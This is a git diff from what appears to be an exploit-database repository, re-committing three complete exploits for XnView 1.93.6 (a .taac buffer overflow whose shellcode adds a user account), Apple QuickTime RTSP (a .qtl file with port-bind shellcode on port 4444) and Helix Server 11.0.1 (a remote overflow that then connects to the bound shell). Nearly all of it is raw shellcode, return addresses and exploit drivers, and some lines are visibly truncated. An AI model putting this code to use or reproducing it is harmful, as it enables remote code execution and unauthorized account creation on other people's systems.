+"\xcb\xb3\xfb\x7b\xcc\xe7\xaf\x31\xfe\xd7\xcb\x3e\x99\xb5\xaf\x70" +"\xda\xe7\xaf\x72\xd0\xf0\xee\x72\xd8\xe1\xe0\x6b\xcf\xb3\xce\x7a" +"\xd2\xfa\xe1\x77\xcc\xe7\xfd\x7f\xcb\xfc\xfd\x6d\x9f\xe7\xea\x6d" +"\xcb\xb3\xa0\x5f\xfb\xd7\x8f\x1e"; + + +unsigned char ra_sp2[] = "\xed\x1e\x94\x7c"; +unsigned char ra_sp3[] = "\x83\xbf\x8a\x5b"; + +unsigned char nops1[257]; //256 * \x90 +unsigned char nops2[21]; //20 * \x90 + +int main(int argc, char **argv) +{ + int i; + FILE* f; + printf("[+] XnView 1.93.6 for Windows .taac buffer overflow\n"); + printf("[+] Discovered by Secunia : \nhttp://secunia.com/secunia_research/2008-24/advisory/\n"); + printf("[+] Coded by shinnok,greetz to escalation666.\n 
http://www.rstcenter.com \n"); + if ((argc!=2)||((atoi(argv[1])!=0)&&(atoi(argv[1])!=1))){ + printf("Usage: %s target\n",argv[0]); + printf("Where target is:\n"); + printf("0: WinXP SP2\n"); + printf("1: WinXP SP3\n"); + printf("Successfull exploitation will result in the adding of user \"test\" with password \"test\".\n"); + return EXIT_SUCCESS; + } + for(i=0;i<256;i++) nops1[i]='\x90'; + nops1[256]='\0'; + for(i=0;i<14;i++) nops2[i]='\x90'; + nops2[20]='\0'; + if(atoi(argv[1])==0) { + f=fopen("sploit.taac","wb"); + fprintf(f,"ncaa%crank=2;%cbands=3;%csize=125 123;%c",'\xa','\xa','\xa','\xa'); + fprintf(f,"format=%s%s%s%s;%c",nops1,ra_sp2,nops2,scode,'\xa'); + }else{ + f=fopen("sploit.taac","wb"); + fprintf(f,"ncaa%crank=2;%cbands=3;%csize=125 123;%c",'\xa','\xa','\xa','\xa'); + fprintf(f,"format=%s%s%s%s;%c",nops1,ra_sp3,nops2,scode,'\xa'); + } + fclose(f); + printf("sploit.taac created!\n"); + printf("Now open sploit.taac in XnView or browse from it to the folder containing sploit.taac.\n"); + printf("Then check with \"net user\" or from control panel for the user account test.\n"); + return EXIT_SUCCESS; +} + +// milw0rm.com [2008-06-26] diff --git a/platforms/windows/remote/3072.py b/platforms/windows/remote/3072.py index f091b3b2e..95b6c5f6a 100755 --- a/platforms/windows/remote/3072.py +++ b/platforms/windows/remote/3072.py 
@@ -1,97 +1,97 @@ -#!/usr/bin/python -#Port bind exploit for apple quicktime rtsp vulnerability -#Tested on windows 2000 SP0 and SP4 with quicktime 7.1.3.100. Should be easy -#to port the exploit to others. All one needs to do is look for the appropriate -#jump address. Certain characters are not permitted in the shellcode. -#Alphanumeric shellcodes work fine. -#This script creates a qtl file which when clicked upon binds a shell to TCP -#port 4444. This file can be delivered through several means; HTTP, SMTP etc -# -# Winny Thomas ;-) -# Author shall bear no responsibility for any kind of screws up caused by using -# this code - -import sys - -#alpha numeric port bind shellcode from metasploit; binds shell to port 4444 -shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" -shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58" -shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57" -shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38" -shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58" -shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" -shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" -shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48" -shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54" -shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58" -shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d" -shellcode += 
"\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38" -shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56" -shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36" -shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57" -shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e" -shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e" -shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30" -shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35" -shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34" -shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41" -shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a" -shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31" -shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" -shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d" -shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d" -shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56" -shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45" -shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46" -shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c" -shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c" -shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32" -shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36" -shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f" -shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36" -shellcode += 
"\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56" -shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56" -shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" -shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" -shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d" -shellcode += "\x4f\x4f\x42\x4d\x5a\x90" -shellcode += "\x90" * 90 - - -def CreateQTL(sp): - if sp == "1": - JMPedi = '\xf5\x0c\xe5\x77' #Address of jmp edi from user32.dll - elif sp == "2": - JMPedi = '\x34\xd9\xe4\x77' #Address of jmp edi from user32.dll - else: - print 'Unsupported Service pack number' - sys.exit(-1) - - #XML template from http://www.milw0rm.org/exploits/3064 - QTL = "" - QTL += "" - QTL += "\n" - - fd = open('./exp.qtl', 'w') - fd.write(QTL) - fd.close() - -if __name__ == '__main__': - try: - sp = sys.argv[1] - except IndexError: - print 'Usage: %s \n' % sys.argv[0] - print 'Version: 1 => windows 2000 server SP0' - print 'Version: 2 => windows 2000 server SP4' - sys.exit(-1) - - CreateQTL(sp) - -# milw0rm.com [2007-01-03] +#!/usr/bin/python +#Port bind exploit for apple quicktime rtsp vulnerability +#Tested on windows 2000 SP0 and SP4 with quicktime 7.1.3.100. Should be easy +#to port the exploit to others. All one needs to do is look for the appropriate +#jump address. Certain characters are not permitted in the shellcode. +#Alphanumeric shellcodes work fine. +#This script creates a qtl file which when clicked upon binds a shell to TCP +#port 4444. 
This file can be delivered through several means; HTTP, SMTP etc +# +# Winny Thomas ;-) +# Author shall bear no responsibility for any kind of screws up caused by using +# this code + +import sys + +#alpha numeric port bind shellcode from metasploit; binds shell to port 4444 +shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" +shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58" +shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57" +shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38" +shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58" +shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" +shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" +shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48" +shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54" +shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58" +shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d" +shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38" +shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56" +shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36" +shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57" +shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e" +shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e" +shellcode += 
"\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30" +shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35" +shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34" +shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41" +shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a" +shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31" +shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" +shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d" +shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d" +shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56" +shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45" +shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46" +shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c" +shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c" +shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32" +shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36" +shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f" +shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36" +shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56" +shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56" +shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" +shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" +shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d" +shellcode += "\x4f\x4f\x42\x4d\x5a\x90" +shellcode += "\x90" * 90 + + +def CreateQTL(sp): + if sp == "1": + JMPedi = '\xf5\x0c\xe5\x77' #Address of 
jmp edi from user32.dll + elif sp == "2": + JMPedi = '\x34\xd9\xe4\x77' #Address of jmp edi from user32.dll + else: + print 'Unsupported Service pack number' + sys.exit(-1) + + #XML template from http://www.milw0rm.org/exploits/3064 + QTL = "" + QTL += "" + QTL += "\n" + + fd = open('./exp.qtl', 'w') + fd.write(QTL) + fd.close() + +if __name__ == '__main__': + try: + sp = sys.argv[1] + except IndexError: + print 'Usage: %s \n' % sys.argv[0] + print 'Version: 1 => windows 2000 server SP0' + print 'Version: 2 => windows 2000 server SP4' + sys.exit(-1) + + CreateQTL(sp) + +# milw0rm.com [2007-01-03] diff --git a/platforms/windows/remote/3531.py b/platforms/windows/remote/3531.py index 67389225f..909908307 100755 --- a/platforms/windows/remote/3531.py +++ b/platforms/windows/remote/3531.py 
@@ -1,121 +1,121 @@
-#/usr/bin/python
-# Remote exploit for the vulnerability in Helix server v11.0.1 as described
-# at http://gleg.net/helix.txt
-#
-# The exploit spawns a shell on TCP port 4444 and connects to it. At the time of
-# overflow we control EAX which is used in a call as follows
-# 00420C64: call dword ptr [eax + 4]
-# ECX points into our buffer at the time of overflow. So if we can craft a DWORD
-# that points to an address that translates to call dword ptr [ecx + xx] and
-# have a pointer into our shellcode at that location then our shellcode executes
-# Yes, a lot of indirection here :-). This exploit uses hardcoded address which
-# worked fine on Windows 2000 server SP4 machines I have in my test lab. You may
-# have to tweak it for your environment.
-# Credits for discovery and POC goes to Evgeny Legerov
-# Author shall bear no reponsibility for any screw ups caused by using this code
-# Winny Thomas :-)
-
-import os
-import sys
-import time
-import base64
-import socket
-import struct
-
-#alphanumeric portbind shellcode from metasploit. 
Binds shell to port 4444 -shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" -shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58" -shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57" -shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38" -shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58" -shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" -shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" -shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48" -shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54" -shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58" -shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d" -shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38" -shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56" -shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36" -shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57" -shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e" -shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e" -shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30" -shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35" -shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34" -shellcode += 
"\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41" -shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a" -shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31" -shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" -shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d" -shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d" -shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56" -shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45" -shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46" -shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c" -shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c" -shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32" -shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36" -shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f" -shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36" -shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56" -shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56" -shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" -shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" -shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d" -shellcode += "\x4f\x4f\x42\x4d\x5a\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" - -def ExploitHelix(target): - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.connect((target, 554)) - - payload = 'A' * 1116 - # This DWORD in payload causes a call into the next DWORD - payload += struct.pack('\n' % sys.argv[0] - sys.exit(-1) - - ExploitHelix(target) - print 'Exploit sent to: 
%s' % target
- print 'Connecting to %s:4444' % target
- time.sleep(3)
- ConnectRemoteShell(target)
-
-# milw0rm.com [2007-03-21]
+#/usr/bin/python
+# Remote exploit for the vulnerability in Helix server v11.0.1 as described
+# at http://gleg.net/helix.txt
+#
+# The exploit spawns a shell on TCP port 4444 and connects to it. At the time of
+# overflow we control EAX which is used in a call as follows
+# 00420C64: call dword ptr [eax + 4]
+# ECX points into our buffer at the time of overflow. So if we can craft a DWORD
+# that points to an address that translates to call dword ptr [ecx + xx] and
+# have a pointer into our shellcode at that location then our shellcode executes
+# Yes, a lot of indirection here :-). This exploit uses hardcoded address which
+# worked fine on Windows 2000 server SP4 machines I have in my test lab. You may
+# have to tweak it for your environment.
+# Credits for discovery and POC goes to Evgeny Legerov
+# Author shall bear no reponsibility for any screw ups caused by using this code
+# Winny Thomas :-)
+
+import os
+import sys
+import time
+import base64
+import socket
+import struct
+
+#alphanumeric portbind shellcode from metasploit. 
Binds shell to port 4444 +shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" +shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58" +shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57" +shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38" +shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58" +shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" +shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" +shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48" +shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54" +shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58" +shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d" +shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38" +shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56" +shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36" +shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57" +shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e" +shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e" +shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30" +shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35" +shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34" +shellcode += 
"\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41" +shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a" +shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31" +shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" +shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d" +shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d" +shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56" +shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45" +shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46" +shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c" +shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c" +shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32" +shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36" +shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f" +shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36" +shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56" +shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56" +shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" +shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" +shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d" +shellcode += "\x4f\x4f\x42\x4d\x5a\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + +def ExploitHelix(target): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect((target, 554)) + + payload = 'A' * 1116 + # This DWORD in payload causes a call into the next DWORD + payload += struct.pack('\n' % sys.argv[0] + sys.exit(-1) + + ExploitHelix(target) + print 'Exploit sent to: 
%s' % target
+ print 'Connecting to %s:4444' % target
+ time.sleep(3)
+ ConnectRemoteShell(target)
+
+# milw0rm.com [2007-03-21]